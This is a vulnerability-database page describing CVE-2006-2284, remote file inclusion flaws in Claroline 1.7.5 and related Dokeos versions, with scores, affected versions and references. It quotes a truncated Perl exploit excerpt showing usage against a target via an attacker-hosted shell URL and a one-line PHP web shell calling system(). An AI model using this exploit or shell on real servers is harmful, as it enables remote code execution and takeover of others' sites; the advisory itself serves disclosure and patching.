Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
6.8
CVSSv2

CVE-2006-2284

Published: 10/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Subscribe to Claroline

Vulnerability Summary

Multiple PHP remote file inclusion vulnerabilities in Claroline 1.7.5 allow remote malicious users to execute arbitrary PHP code via a URL in the (1) clarolineRepositorySys parameter in ldap.inc.php and the (2) claro_CasLibPath parameter in casProcess.inc.php.

Vulnerable Product Search on Vulmon Subscribe to Product

claroline claroline 1.7.4

claroline claroline 1.7.5

dokeos dokeos 1.6_rc2

claroline claroline 1.6_rc1

claroline claroline 1.7.2

dokeos dokeos 1.5.5

dokeos dokeos 1.6.4

claroline claroline 1.5

claroline claroline 1.5.3

dokeos dokeos 1.4

dokeos dokeos 1.5

claroline claroline 1.5.4

claroline claroline 1.6

claroline claroline 1.6_beta

dokeos dokeos 1.5.3

dokeos dokeos 1.5.4

Exploits

Exploit DB: Claroline E-Learning 1.75 - 'ldap.inc.php' Remote File Inclusion
#!/usr/bin/perl ############ # Claroline Open Source e-Learning 175 Remote File Include # Exploit & Advisorie: beford <xbefordx gmail com> # # uso:# perl ownpl <host> <cmd-shell-url> <cmd-var> # perl ownpl hostcom/claroline/auth/ atacante/shellgif cmd # # cmd shell example: <? system($cmd); ?& ...

References

NVD-CWE-Otherhttp://www.securityfocus.com/bid/17873http://secunia.com/advisories/20003http://www.osvdb.org/25316http://securityreason.com/securityalert/875http://www.vupen.com/english/advisories/2006/1701https://exchange.xforce.ibmcloud.com/vulnerabilities/26280https://www.exploit-db.com/exploits/1766http://www.securityfocus.com/archive/1/433249/100/0/threadedhttps://nvd.nist.govhttps://www.exploit-db.com/exploits/1766/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
encryptionCVE-2024-4331CVE-2024-26925arbitrary codeCVE-2006-4304CVE-2024-25458CVE-2024-27077reflected XSSCVE-2024-4059
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook